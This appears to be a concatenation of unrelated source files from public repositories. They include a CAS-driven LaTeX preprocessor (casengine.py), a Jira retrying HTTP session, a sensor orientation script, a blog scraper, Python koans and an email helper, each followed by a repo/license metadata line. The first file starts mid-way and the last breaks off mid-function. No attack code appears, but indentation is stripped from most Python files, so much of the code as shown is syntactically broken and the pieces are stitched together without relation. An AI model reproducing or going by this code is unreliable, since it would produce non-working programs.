from Cauldron.ktl import Service
Service(servicename)
def test_mock_has_keyword(backend, mock_client):
"""Mock has a client."""
assert mock_client.has_keyword("anyvaluewilldo") | alexrudy/Cauldron | Cauldron/tests/test_mock.py | Python | bsd-3-clause | 1,510 |
#!/usr/bin/python
import sys
import time
import FXOS8700CQR1 as imuSens
from ctypes import *
imuSens = imuSens.FXOS8700CQR1() #Configure chip in hybrid mode
def main(argv):
id = imuSens.getID() #Verify chip ID
print "Chip ID: 0x%02X. \r\n" % id
imuSens.standbyMode()
imuSens.activeMode()
id = imuSens.getChipMode() #Configure sensor as accelerometer
print "Chip Mode: 0x%02X. \r\n" % id
id = imuSens.getTemperature()
print "Chip Temperature: 0x%02X. \r\n" % id
def L1():
print "Landscape right.\r\n"
def L2():
print "Landscape left. \r\n"
def P1():
print "Portrait down.\r\n"
def P2():
print "Portrait up.\r\n"
options = {0 : L1,
1 : L2,
2 : P1,
3 : P2
}
imuSens.configureAccelerometer()
imuSens.configureMagnetometer()
imuSens.configureOrientation();
modeprevious = 0
while True:
if(imuSens.readStatusReg() & 0x80):
orienta = imuSens.getOrientation()
mode = (orienta >> 1) & 0x03
if (mode != modeprevious):
options[mode]()
modeprevious = mode
print "Shutting down"
if __name__ == '__main__':
try:
main(sys.argv[1:])
except KeyboardInterrupt:
print("")
| sensorian/sensorian-firmware | Drivers_Python/FXOS8700CQR1/EX3_Orientation.py | Python | lgpl-3.0 | 1,196 |
from automlk.store import get_key_store, list_key_store, lpush_key_store
from automlk.config import *
dataset_id = '42'
round_id = 1
results = list_key_store('dataset:%s:rounds' % dataset_id)
for r in results:
if r['round_id'] == round_id:
# print(r)
# reinject this round in another dataset experiment
msg_search = {'dataset_id': '47', 'round_id': 107, 'solution': r['solution'], 'level': 1,
'ensemble_depth': 0, 'model_name': r['model_name'], 'model_params': r['model_params'], 'pipeline': r['pipeline'],
'threshold': 0, 'time_limit': 10000}
print('sending %s' % msg_search)
lpush_key_store(SEARCH_QUEUE, msg_search)
| pierre-chaville/automlk | tests/test_inject.py | Python | mit | 685 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# LICENCE: GNU AFFERO GENERAL PUBLIC LICENSE v.3 https://github.com/dlfer/casengine/blob/master/LICENSE
# https://github.com/dlfer/casengine
# (C) DLFerrario http://www.dlfer.xyz
r"""
# Version: 2020-04-01
casengine.py [options] [filename]
a Pre-Processor for (La)TeX files, that interact with Compuuter Algebra Systems: sympy, maple, ...
RUN: casengine.py < example.tex > example_out.tex
[or] casengine.py example.tex
==> example_symout.tex generated
OPTIONS:
--help|-h Help
--verbose|-v Verbose Running
--output=|-o [FILENAME] explicit output filename
--sty Generate the file `casengine.sty` in the current dir.
--noexec|-n Do not execute any sympy code.
EXAMPLES:
$ casengine.py --sty
$ casengine.py -o example_out.tex example.tex
LATEX:
%s
=>
%s
https://github.com/dlfer/casengine
(C) DLFerrario http://www.dlfer.xyz
"""
from __future__ import absolute_import
import sys
import re
import os
import getopt
import datetime, time
from six.moves import range
#--------------------------------------------------------------------------
__sty__=r"""
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\def\fileversion{0.92}
\def\filedate{2017-06-12}
\def\Copyright{**********************************************
Quest'opera è stata rilasciata con licenza Creative Commons Attribuzione - Non commerciale - Non opere derivate 3.0 Unported. Per leggere una copia della licenza visita il sito web http://creativecommons.org/licenses/by-nc-nd/3.0/ o spedisci una lettera a Creative Commons, 171 Second Street, Suite 300, San Francisco, California, 94105, USA.
Credits to https://tex.stackexchange.com/questions/127010/how-can-i-make-lstinline-function-normally-inside-math-mode
(C) DLFerrario http://www.dlfer.xyz
**********************************************
}
\NeedsTeXFormat{LaTeX2e}[1996/06/01]
\typeout{Package `CasEngine' <\filedate>.}
\typeout{\Copyright}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\usepackage{kvoptions}
\SetupKeyvalOptions{
family = CAS,
prefix = CAS@
}
\DeclareStringOption{CAS}
\DeclareStringOption{CASOptions}
\DeclareStringOption{CASPrompt}
\DeclareStringOption{CASLatex}
\DeclareStringOption{CASLatexOutsep}
\DeclareStringOption{CASAssignString}
\DeclareStringOption{CASPreamble}
\ProcessKeyvalOptions*
\typeout{%
CAS=\CAS@CAS,
CASOptions=\CAS@CASOptions,
CASPrompt=\CAS@CASPrompt,
CASLatex=\CAS@CASLatex,
CASLatexOutsep=\CAS@CASLatexOutsep,
CASAssignString=\CAS@CASAssignString,
CASPreamble=\CAS@CASPreamble
}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\RequirePackage{listings}
\lstset{language=Python,
basicstyle=\ttfamily,
mathescape=true
}
\usepackage{letltxmacro}
\newcommand*{\SavedLstInline}{}
\LetLtxMacro\SavedLstInline\lstinline
\DeclareRobustCommand*{\lstinline}{%
\ifmmode
\let\SavedBGroup\bgroup
\def\bgroup{%
\let\bgroup\SavedBGroup
\hbox\bgroup
}%
\fi
\SavedLstInline
}
\newenvironment{symfor}[2]{%
\noindent\lstinline|((for #1 in [#2] ))|
}{%
\noindent\lstinline|((end for ))|
}
\newcommand{\sym}[1]{%
\lstinline|(( #1 ))|
}
\newcommand{\symexec}[1]{%
\lstinline|((symexec: #1 ))|
}
"""
#--------------------------------------------------------------------------
VERBOSE=False
NOEXEC=False
#--------------------------------------------------------------------------
example_tex=r"""
% the following command restart the NameSpace (it is the only non-python command)
\symexec{CLEAR}
\symexec{x=t**2-t-1
y=t**3-t**2+1}
\begin{symfor}{A}{x+1;x-2;y+4} % separator is ";", every symbolic expression in between
\begin{symfor}{t}{range(-1,2)} % same syntax as python (1,2 or 3 arguments)
$t=\sym{t}$ %its value
\end{symfor}
Now this is the first line
This is the second line:
$\sym{1+1}$ %its value
\symexec{B=A**3} % execute code
\[
\sym{factor(B+A**2)}
\]
Last line
\end{symfor}
"""
example_tex_maple=r"""
\documentclass[a4paper,twoside,leqno]{article}
\usepackage{amsmath,amsthm,amssymb,amsfonts}
\usepackage{mathpazo} % I like it.
\usepackage[CAS=maple]{casengine}
\newcounter{exer}
\numberwithin{exer}{subsection}
\renewcommand{\theexer}{(E\arabic{exer})}
\renewcommand{\thesubsection}{\Alph{subsection})}
\newtheoremstyle{exer}% name
{24pt}% Space above
{24pt}% Space below
{}% Body font: it was: \itshape
{}% Indent amount (empty = no indent, \parindent = para indent)
{\bfseries}% Thm head font
{}% Punctuation after thm head
{.5em}% Space after thm head: " " = normal interword space;
% \newline = linebreak
{}% Thm head spec (can be left empty, meaning `normal')
\theoremstyle{exer}
\newtheorem{exe}[exer]{}
\begin{document}
\section{Esercizi}
\begin{symfor}{q}{range(1,3)}%
\begin{symfor}{c}{range(1,3)}%
\begin{symfor}{x}{cos(t);sin(t);tan(t);exp(t);cosh(t);sinh(t);t**3-t**2+t-1}%
\symexec{g:=q*x+c;}
\begin{exe}
Try to compute
\symexec{F:=Diff(expand(g),t);}
\[
\sym{F}
\]
Answer: $\sym{simplify(value(F))}$.
\end{exe}
\end{symfor}
\end{symfor}
\end{symfor}
\end{document}
"""
#--------------------------------------------------------------------------
def my_strftime(td):
secs=td.total_seconds()
x=secs - td.seconds
h, rem = divmod(secs,60*60)
m,s = divmod(rem,60)
return "%02i:%02i:%02i%s" % (h,m,s, ("%.02f" % (x))[1:] )
#--------------------------------------------------------------------------
class Logger():
def write(self,s):
dt=datetime.datetime.fromtimestamp(int(time.time()))
global VERBOSE
if VERBOSE:
sys.stderr.write("# %s #: %s" % (dt.isoformat(" "), s))
def msg(self,s):
sys.stderr.write("%s" % s)
def times(self,start_time,end_time,filename, casengine=None):
FMT="YYYY-MM-DD HH:MM:SS" # what for?
start_datetime=datetime.datetime.fromtimestamp(int(start_time))
end_datetime=datetime.datetime.fromtimestamp(int(end_time))
elapsed_time=datetime.timedelta(seconds=end_time-start_time)
output="File %s created by casengine.py (CAS engine: %s)\nStarted: %s\nFinished: %s\nElapsed time: %s\n" % (filename,casengine, start_datetime.isoformat(" "), end_datetime.isoformat(" "), my_strftime(elapsed_time) )
return output
LOG=Logger()
#--------------------------------------------------------------------------
class CasEngine(object):
def __init__(self,name=None,start_time=time.time(),do_cas_init=True):
LOG.write("__init__ called!\n")
self.reg_forcycleiter=re.compile( r"(\\begin{symfor}{(?P<var>.+?)}{(?P<symlist>.+?)})|(\\end{symfor})", re.M and re.DOTALL)
# self.reg_forcycleiter=re.compile( r"(\n\\symfor{(?P<var>.+?)}{(?P<symlist>.+?)})|(\n\\symforend)", re.M and re.DOTALL)
self.reg_symexec=re.compile(r"\\symexec{")
self.reg_sym=re.compile(r"\\(sym|symexec){(?P<symdata>.+?)}", re.M and re.DOTALL)
self.reg_range=re.compile(r" *range\((?P<rangearg>.+)\)" )
self.name=name
self.localNameSpace={}
self.cas_engine=None
if do_cas_init: self.cas_init()
self.number_of_syms=None #initialized by filter
self.number_of_syms_iter=None
self.start_time=start_time
# To be defined according to wich CAS system...
def cas_latex(self):
return "LATEX"
def cas_init(self):
LOG.write("nothing done!\n")
def cas_exec(self,s):
return None
def cas_get(self,s):
return None
def cas_let(self,a,b):
return None
def cas_forlist(self,s):
mo=self.reg_range.search(s)
if mo:
# sanitize the input of the eval...
return ["%s" % x for x in eval("range(%s)" % mo.group('rangearg') , {'__builtins__':None}, {'range': range } ) ]
else:
return s.split(';')
def tex_comment(self,s):
return "".join([("%%%s" % l) for l in s.splitlines(True)])
#Now: common functions to parse LaTeX
def expand_forcycle(self,s):
LOG.write("expand_forcycle called on a tex string of length: %s chars\n%s\n" % (len(s),s) )
if self.reg_forcycleiter.search(s):
all = [ff for ff in self.reg_forcycleiter.finditer(s)]
lenall=len(all)
for i in range(lenall-1):
if all[i].group('var') and not all[i+1].group('var'):
s_before=s[:all[i].start()]
s_during=s[all[i].end():all[i+1].start()]
s_after=s[all[i+1].end():]
s_var=all[i].group('var')
s_symlist=self.cas_forlist(all[i].group('symlist'))
s_symlist_tokens=[ "%%%%sym_for %s:\n\symexec{%s}%s%%%%end sym_for %s" % (s_var,self.cas_let( s_var, x) ,s_during, s_var) for x in s_symlist ]
s_during_expanded = "\n".join(s_symlist_tokens)
return self.expand_forcycle( ( s_before + s_during_expanded + s_after ) )
raise Exception ("CasEngine ERROR: symfor does not end well!\n")
else:
return s
def sym_filter(self,s):
LOG.write("sym_filter called on a tex string of length: %s chars\n" % len(s))
self.number_of_syms=len(self.reg_sym.findall(s))
self.number_of_syms_iter=0
LOG.write("There are %s sym's to be processed...\n" % self.number_of_syms)
return self.reg_sym.sub(self.my_filter_func,s)
def my_filter_func(self,ob):
self.number_of_syms_iter += 1
ETA=(time.time() - self.start_time) * (self.number_of_syms*1.0/self.number_of_syms_iter - 1 )
ETAstr=my_strftime(datetime.timedelta(seconds=ETA))
numlen=str(len(str(self.number_of_syms)))
if VERBOSE:
LOG.msg(("\rProgress: %"+numlen+"i/%i (%6.2f%%: ETA = %s) ") \
% (self.number_of_syms_iter, self.number_of_syms ,
self.number_of_syms_iter * 100.0 / self.number_of_syms ,ETAstr ))
else:
LOG.msg(".")
if self.reg_symexec.match(ob.group()):
if ob.group('symdata').strip() == 'CLEAR':
LOG.write("Trying to clear namespace...\n")
#preserve the number of syms...
tmpsyms=self.number_of_syms
tmpsyms_iter=self.number_of_syms_iter
self.__init__(name=self.name,start_time=self.start_time)
self.number_of_syms=tmpsyms
self.number_of_syms_iter=tmpsyms_iter
LOG.write(" ...done!\n")
return self.tex_comment(" ==> NameSpace CLEARED")
else:
return self.cas_exec( ob.group('symdata') )
else:
return self.cas_get( ob.group('symdata') )
#--------------------------------------------------------------------------
class SympyEngine(CasEngine):
def cas_init(self):
exec(r"""
from sympy import __version__
from sympy.abc import *
from sympy import *
""" , self.localNameSpace)
self.cas_engine="SymPy Version %s" % self.localNameSpace['__version__']
def cas_exec(self,s):
output='cas_exec: %s' % s
try:
exec(s, self.localNameSpace)
except Exception as v:
output += " => ERROR: %s\n" % v
raise Exception("SymPy Error: %s while processing command `%s'" % (v,s) )
return self.tex_comment(output)
def cas_get(self,s):
exec(r"""output_string=latex(sympify(%s))""" % s, self.localNameSpace)
return self.localNameSpace['output_string']
def cas_let(self,a,b):
"""Return the string to assign variable value b to a"""
return "%s=%s" % (a,b)
#--------------------------------------------------------------------------
def remove_ansi_escape(line):
ansi_escape =re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
ansi_escape =re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
return ansi_escape.sub(" ",line)
# return ansi_escape.sub(b'', line.encode()).decode('utf-8')
#--------------------------------------------------------------------------
class ExpectEngine(CasEngine):
def cas_init(self,
cas='REMOVEDmaple',
cas_options='-t -c "interface(screenwidth=infinity,errorcursor=false)"',
cas_prompt='#-->',
cas_latex='latex(%s);',
cas_latex_outsep='\n',
cas_assign_string='%s:= %s;',
cas_preamble=None):
import pexpect
self.EOF=pexpect.EOF
self.cas_name=cas
self.cas_engine="pExpect -> %s " % cas
self.cas_prompt=cas_prompt
self.cas_latex=cas_latex
self.cas_latex_outsep=cas_latex_outsep
self.cas_assign_string=cas_assign_string
cas_torun=(cas +" " + cas_options)
# self.child = pexpect.spawn(cas_torun , timeout=60, ignore_sighup=False ,encoding='utf-8', env = {"TERM": "dumb"} )
os.environ["TERM"] = "dumb"
os.environ["IPY_TEST_SIMPLE_PROMPT"] = "True"
self.child = pexpect.spawn(cas_torun , timeout=60, ignore_sighup=False ,encoding='utf-8' )
self.child.expect(self.cas_prompt)
if cas_preamble:
for x in cas_preamble.split("\n"):
self.child.sendline(x)
self.child.expect(self.cas_prompt)
return
def cas_exec(self,s):
output='cas_exec: %s' % ( s, )
self.child.sendline(s)
self.child.expect(self.cas_prompt)
out_null=self.child.before ## what for?
return self.tex_comment(output)
def cas_get(self,s):
self.child.sendline(self.cas_latex % s)
self.child.expect(self.cas_prompt)
out=remove_ansi_escape(self.child.before)
# out = out[out.find(';')+1:].strip() ## __TODO__ change also this...
# out = out[out.find('\n')+1:].strip() ## __TODO__ change also this...
if self.cas_name=='maxima':
tokens=out.split(self.cas_latex_outsep)
out = " ".join(tokens[1:-1])
out=out.strip()
else:
out = out[out.find(self.cas_latex_outsep)+len(self.cas_latex_outsep):].strip()
LOG.write("Found cas_get `%s`" % out)
return out
def cas_let(self,a,b):
# TODO: switch cases...
return self.cas_assign_string % (a,b)
def __del__(self):
LOG.write("Trying to clean up spawn processes...\n")
# self.child.sendline("quit()")
# self.child.expect(self.cas_prompt) #__TODO__ cmaple all the time running...
self.child.sendeof()
# self.child.expect(self.EOF)
self.child.close()
self.child.terminate()
#--------------------------------------------------------------------------
# "%colors NoColor"
DEFAULT_OPTIONS={
'maple': {'CASOptions': '-t -c "interface(screenwidth=infinity,errorcursor=false)"' , 'CASPrompt': '#-->' , 'CASLatex': 'latex(%s);' , 'CASLatexOutsep':'\n', 'CASAssignString': '%s:= %s;' , 'CASPreamble' : '' },
'sage-5' : {'CASOptions': '-q', 'CASPrompt': 'sage: ', 'CASLatex': 'latex(%s)', 'CASLatexOutsep':'\n', 'CASAssignString' : '%s= %s' , 'CASPreamble': "%colors NoColor"},
'sage' : {'CASOptions': '-q', 'CASPrompt': '(sage: |>>> )', 'CASLatex': '%s', 'CASLatexOutsep':'\n', 'CASAssignString' : '%s= %s' , 'CASPreamble': "%colors NoColor\nfrom IPython.terminal.prompts import ClassicPrompts\nip = get_ipython()\nip.prompts = ClassicPrompts(ip)"},
'math' : {'CASOptions': '-rawterm', 'CASPrompt': 'In[[0-9]+]:=', 'CASLatex': 'TeXForm [%s]', 'CASLatexOutsep':'TeXForm=', 'CASAssignString' : '%s= %s' , 'CASPreamble': ""},
'gap' : {'CASOptions': '-b -T ', 'CASPrompt': 'gap>', 'CASLatex': 'Print(%s);', 'CASLatexOutsep':';', 'CASAssignString' : '%s:= %s;' , 'CASPreamble': ""},
'maxima' : {'CASOptions': '-q --disable-readline', 'CASPrompt': '(%i[0-9]+)', 'CASLatex': 'tex(%s)$', 'CASLatexOutsep':'$$', 'CASAssignString' : '%s: %s $' , 'CASPreamble': ""}
}
# GAP LaTeXObj not working yet...
#--------------------------------------------------------------------------
def latex_unescape(s):
tmps=re.sub(r"\\%","%",s)
return tmps
#--------------------------------------------------------------------------
def get_cas_options(s):
global DEFAULT_OPTIONS
options={}
reg_cas_options=re.compile(r"^\\usepackage\[(?P<CasOptions>.+?)\]{casengine}", re.M)
mo=reg_cas_options.search(s)
if mo:
LOG.write("cas_options found: %s\n" % mo.group('CasOptions') )
for token in mo.group('CasOptions').split(","):
k,v=token.partition("=")[::2]
options[k.strip()]=latex_unescape(v.strip())
else:
LOG.write("No cas_options found\n" )
return options
if 'CAS' in options and options['CAS'] in DEFAULT_OPTIONS:
result=DEFAULT_OPTIONS[options['CAS']]
for k in options:
result[k]=options[k]
else:
LOG.msg("WARNING: option %s has no default! Errors ahead...\n" % options['CAS'])
result=options
LOG.write(options)
return result
#--------------------------------------------------------------------------
def get_opt():
global VERBOSE, NOEXEC
explicit_output=False
try:
opts,args = getopt.getopt(sys.argv[1:],"hvno:",["help","output=","sty","verbose","noexec"])
except getopt.GetoptError as err:
sys.stderr.write("GetOpt Error: %s\n[option --help for help]\n" % err)
sys.exit(2)
for o,a in opts:
if o in ("-v", "--verbose"):
VERBOSE = True
elif o in ("-n", "--noexec"):
NOEXEC = True
elif o in ("-h", "--help"):
sys.stdout.write(__doc__ % (example_tex, example_test() ) )
sys.exit()
elif o in ("--sty",):
fd=open('casengine.sty','w')
fd.write(__sty__)
fd.close()
LOG.msg("File %s created!\n" % fd.name)
sys.exit()
elif o in ("-o","--output"):
explicit_output=True
fd_output=open(a,'w')
else:
assert False, "unhandled option"
if len(args)==0:
input_data=sys.stdin.read()
if not explicit_output:
fd_output=sys.stdout
else:
input_data=open(args[0]).read()
if not explicit_output:
b,e=os.path.splitext(args[0])
fd_output=open("%s_symout%s" % (b,e),'w')
return input_data, fd_output
#--------------------------------------------------------------------------
def example_test():
SE=SympyEngine()
# SE=ExpectEngine()
# s= SE.expand_forcycle(example_tex_maple)
s= SE.expand_forcycle(example_tex)
if VERBOSE: LOG.msg("GET_CAS_DATA: %s\n"% get_cas_options(example_tex_maple))
return(SE.sym_filter(s))
#--------------------------------------------------------------------------
def old_main():
SE=SympyEngine()
s=sys.stdin.read()
LOG.write("expand for cycles...")
s=SE.expand_forcycle(s)
LOG.write("done!\n")
sys.stdout.write(SE.sym_filter(s))
LOG.write("Finished!\n")
#--------------------------------------------------------------------------
def main():
global VERBOSE, NOEXEC
start_time=time.time()
input_data,fd_output = get_opt()
cas_options=get_cas_options(input_data)
if VERBOSE: LOG.write("cas_options: %s\n" % cas_options)
if cas_options:
SE=ExpectEngine(name=cas_options['CAS'],do_cas_init=False)
SE.cas_init(cas=cas_options['CAS'],
cas_prompt=cas_options['CASPrompt'],
cas_options=cas_options['CASOptions'],
cas_latex=cas_options['CASLatex'],
cas_latex_outsep=cas_options['CASLatexOutsep'],
cas_assign_string=cas_options['CASAssignString'],
cas_preamble=cas_options['CASPreamble']
)
LOG.msg(" => Found CAS Engine= %s\n" % cas_options['CAS'])
else:
LOG.msg("No CAS Engine Stated: using SymPy\n" )
SE=SympyEngine()
expanded_data=SE.expand_forcycle(input_data)
LOG.write("done expanding forcycles!\n")
if NOEXEC:
LOG.write("NOT executing symexec and sym commands...\n")
output_data=expanded_data
else:
LOG.write("now executing symexec and sym commands...\n")
output_data=SE.sym_filter(expanded_data)
end_time=time.time()
fd_output.write(SE.tex_comment( LOG.times(start_time,end_time,fd_output.name, casengine=SE.cas_engine) ) )
fd_output.write(output_data)
LOG.msg("\n")
del SE
LOG.msg("\n => ...done! File %s created!\n" % fd_output.name)
if __name__=='__main__':
# example_test()
main()
| dlfer/casengine | casengine.py | Python | agpl-3.0 | 19,507 |
# An extension of `list` that loops indices.
class Ring(tuple):
def __getitem__(self, key):
length = len(self)
# For slices, one index must still be in the usual range
# To trigger the special behaviour, the indices must be different and one must be outside the usual range
# To get the looping effect, modulo the start and stop and index into two copies of the original tuple
if isinstance(key, slice):
start, stop = key.start, key.stop
if start is None:
start = 0
if stop is None:
stop = length
if start > length or stop < 0 or stop-start > length:
raise IndexError
if start != stop and (start < 0 or stop > length):
start %= length
stop %= length
if start >= stop:
return (self+self)[slice(start,stop+length,key.step)]
# For int key, just modulo the index
elif isinstance(key, int):
key %= length
# Fall-through: if no special case has been triggered, call the super() version
return super().__getitem__(key)
| peterolph/hAIve | ponder/ring.py | Python | mit | 1,181 |
import urllib2
f=open('allarticles.txt','w')
searchstr='<h1 class="entry-title"><a href="'
l=len(searchstr)
urls=[]
for y in range(5):
for m in range(12):
if m<9:
urls.append('https://blogs.lt.vt.edu/engineeredu/index.php/20%d/0%d/'%(12+y,m+1))
else:
urls.append('https://blogs.lt.vt.edu/engineeredu/index.php/20%d/%d/'%(12+y,m+1))
urls.append('https://blogs.lt.vt.edu/engineeredu/index.php/20%d/0%d/'%(17,1))
for url in urls:
try:
response = urllib2.urlopen(url)
html = response.read()
s=html
idx=s.find(searchstr)
while idx>0:
s=s[(idx+l):]
print>>f, s[0:s.find('"')]
idx=s.find(searchstr)
except:
pass
f.close()
searchstr='<div class="entry-content">'
l=len(searchstr)
furls=open('allarticles.txt','r')
f=open('alltext.txt','w')
for url in furls:
try:
response = urllib2.urlopen(url)
html = response.read()
s=html
idx=s.find(searchstr)
while idx>0:
s=s[(idx+l):]
print>>f, s[0:s.find('<div class="sharedaddy sd-sharing-enabled">')]
idx=s.find(searchstr)
except:
pass
f.close()
furls.close()
| aicentral/writestyle | Harvester.py | Python | mit | 1,228 |
import json
import logging
import random
import time
from typing import Callable, Optional, Union, cast
from requests import Response, Session
from requests.exceptions import ConnectionError
from jira.exceptions import JIRAError
logging.getLogger("jira").addHandler(logging.NullHandler())
def raise_on_error(r: Optional[Response], verb="???", **kwargs):
"""Handle errors from a Jira Request
Args:
r (Optional[Response]): Response from Jira request
verb (Optional[str]): Request type, e.g. POST. Defaults to "???".
Raises:
JIRAError: If Response is None
JIRAError: for unhandled 400 status codes.
JIRAError: for unhandled 200 status codes.
"""
request = kwargs.get("request", None)
# headers = kwargs.get('headers', None)
if r is None:
raise JIRAError(None, **kwargs)
if r.status_code >= 400:
error = ""
if r.status_code == 403 and "x-authentication-denied-reason" in r.headers:
error = r.headers["x-authentication-denied-reason"]
elif r.text:
try:
response = json.loads(r.text)
if "message" in response:
# Jira 5.1 errors
error = response["message"]
elif "errorMessages" in response and len(response["errorMessages"]) > 0:
# Jira 5.0.x error messages sometimes come wrapped in this array
# Sometimes this is present but empty
errorMessages = response["errorMessages"]
if isinstance(errorMessages, (list, tuple)):
error = errorMessages[0]
else:
error = errorMessages
# Catching only 'errors' that are dict. See https://github.com/pycontribs/jira/issues/350
elif (
"errors" in response
and len(response["errors"]) > 0
and isinstance(response["errors"], dict)
):
# Jira 6.x error messages are found in this array.
error_list = response["errors"].values()
error = ", ".join(error_list)
else:
error = r.text
except ValueError:
error = r.text
raise JIRAError(
error,
status_code=r.status_code,
url=r.url,
request=request,
response=r,
**kwargs,
)
# for debugging weird errors on CI
if r.status_code not in [200, 201, 202, 204]:
raise JIRAError(
status_code=r.status_code, request=request, response=r, **kwargs
)
# testing for the bug exposed on
# https://answers.atlassian.com/questions/11457054/answers/11975162
if (
r.status_code == 200
and len(r.content) == 0
and "X-Seraph-LoginReason" in r.headers
and "AUTHENTICATED_FAILED" in r.headers["X-Seraph-LoginReason"]
):
pass
class ResilientSession(Session):
"""This class is supposed to retry requests that do return temporary errors.
At this moment it supports: 502, 503, 504
"""
def __init__(self, timeout=None):
self.max_retries = 3
self.max_retry_delay = 60
self.timeout = timeout
super().__init__()
# Indicate our preference for JSON to avoid https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551
self.headers.update({"Accept": "application/json,*.*;q=0.9"})
def __recoverable(
self,
response: Optional[Union[ConnectionError, Response]],
url: str,
request,
counter: int = 1,
):
msg = str(response)
if isinstance(response, ConnectionError):
logging.warning(
f"Got ConnectionError [{response}] errno:{response.errno} on {request} {url}\n{vars(response)}\n{response.__dict__}"
)
if isinstance(response, Response):
if response.status_code in [502, 503, 504, 401]:
# 401 UNAUTHORIZED still randomly returned by Atlassian Cloud as of 2017-01-16
msg = f"{response.status_code} {response.reason}"
# 2019-07-25: Disabled recovery for codes above^
return False
elif not (
response.status_code == 200
and len(response.content) == 0
and "X-Seraph-LoginReason" in response.headers
and "AUTHENTICATED_FAILED" in response.headers["X-Seraph-LoginReason"]
):
return False
else:
msg = "Atlassian's bug https://jira.atlassian.com/browse/JRA-41559"
# Exponential backoff with full jitter.
delay = min(self.max_retry_delay, 10 * 2 ** counter) * random.random()
logging.warning(
"Got recoverable error from %s %s, will retry [%s/%s] in %ss. Err: %s"
% (request, url, counter, self.max_retries, delay, msg)
)
if isinstance(response, Response):
logging.debug("response.headers: %s", response.headers)
logging.debug("response.body: %s", response.content)
time.sleep(delay)
return True
def __verb(
self, verb: str, url: str, retry_data: Callable = None, **kwargs
) -> Response:
d = self.headers.copy()
d.update(kwargs.get("headers", {}))
kwargs["headers"] = d
# if we pass a dictionary as the 'data' we assume we want to send json
# data
data = kwargs.get("data", {})
if isinstance(data, dict):
data = json.dumps(data)
retry_number = 0
exception = None
response = None
while retry_number <= self.max_retries:
response = None
exception = None
try:
method = getattr(super(), verb.lower())
response = method(url, timeout=self.timeout, **kwargs)
if response.status_code >= 200 and response.status_code <= 299:
return response
except ConnectionError as e:
logging.warning(f"{e} while doing {verb.upper()} {url}")
exception = e
retry_number += 1
if retry_number <= self.max_retries:
response_or_exception = response if response is not None else exception
if self.__recoverable(
response_or_exception, url, verb.upper(), retry_number
):
if retry_data:
# if data is a stream, we cannot just read again from it,
# retry_data() will give us a new stream with the data
kwargs["data"] = retry_data()
continue
else:
break
if exception is not None:
raise exception
raise_on_error(response, verb=verb, **kwargs)
# after raise_on_error, only Response objects are allowed through
response = cast(Response, response) # tell mypy only Response-like are here
return response
def get(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("GET", str(url), **kwargs)
def post(self, url: Union[str, bytes], data=None, json=None, **kwargs) -> Response: # type: ignore
return self.__verb("POST", str(url), data=data, json=json, **kwargs)
def put(self, url: Union[str, bytes], data=None, **kwargs) -> Response: # type: ignore
return self.__verb("PUT", str(url), data=data, **kwargs)
def delete(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("DELETE", str(url), **kwargs)
def head(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("HEAD", str(url), **kwargs)
def patch(self, url: Union[str, bytes], data=None, **kwargs) -> Response: # type: ignore
return self.__verb("PATCH", str(url), data=data, **kwargs)
def options(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("OPTIONS", str(url), **kwargs)
| pycontribs/jira | jira/resilientsession.py | Python | bsd-2-clause | 8,330 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutAsserts(Koan):
def test_assert_truth(self):
"""
We shall contemplate truth by testing reality, via asserts.
"""
# Confused? This video should help:
#
# http://bit.ly/about_asserts
self.assertTrue(True) # This should be true
def test_assert_with_message(self):
"""
Enlightenment may be more easily achieved with appropriate messages.
"""
self.assertTrue(True, "This should be true -- and it is true")
def test_fill_in_values(self):
"""
Sometimes we will ask you to fill in the values
"""
self.assertEqual(2, 1 + 1)
def test_assert_equality(self):
"""
To understand reality, we must compare our expectations against
reality.
"""
expected_value = 2
actual_value = 1 + 1
self.assertTrue(expected_value == actual_value)
def test_a_better_way_of_asserting_equality(self):
"""
Some ways of asserting equality are better than others.
"""
expected_value = 2
actual_value = 1 + 1
self.assertEqual(expected_value, actual_value)
def test_that_unittest_asserts_work_the_same_way_as_python_asserts(self):
"""
Understand what lies within.
"""
# This throws an AssertionError exception
assert True
def test_that_sometimes_we_need_to_know_the_class_type(self):
"""
What is in a class name?
"""
# Sometimes we will ask you what the class type of an object is.
#
# For example, contemplate the text string "naval". What is it's class type?
# The koans runner will include this feedback for this koan:
#
# AssertionError: '-=> str <=-' != <type 'str'>
#
# So "naval".__class__ is equal to <type 'str'>? No not quite. This
# is just what it displays. The answer is simply str.
#
# See for yourself:
self.assertEqual(str, "naval".__class__) # It's str, not <type 'str'>
# Need an illustration? More reading can be found here:
#
# http://bit.ly/__class__
| LeMeteore/python_koans | python2/koans/about_asserts.py | Python | mit | 2,275 |
import logging
import smtplib
import cgi
from socket import error as socket_error
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email import Encoders
from smtplib import SMTPRecipientsRefused
from pylons import config
log = logging.getLogger(__name__)
SMTP_SERVER = config.get('smtp.server', '')
SMTP_USER = config.get('smtp.user', '')
SMTP_PASSWORD = config.get('smtp.password', '')
SMTP_FROM = config.get('smtp.mail_from')
def send_email(content, to, subject, file=None):
'''Sends email
:param content: The body content for the mail.
:type string:
:param to: To whom will be mail sent
:type string:
:param subject: The subject of mail.
:type string:
:rtype: string
'''
msg = MIMEMultipart()
from_ = SMTP_FROM
if isinstance(to, basestring):
to = [to]
msg['Subject'] = subject
msg['From'] = from_
msg['To'] = ','.join(to)
content = """\
<html>
<head></head>
<body>
<span>""" + content + """</span>
</body>
</html>
"""
msg.attach(MIMEText(content, 'html', _charset='utf-8'))
if isinstance(file, cgi.FieldStorage):
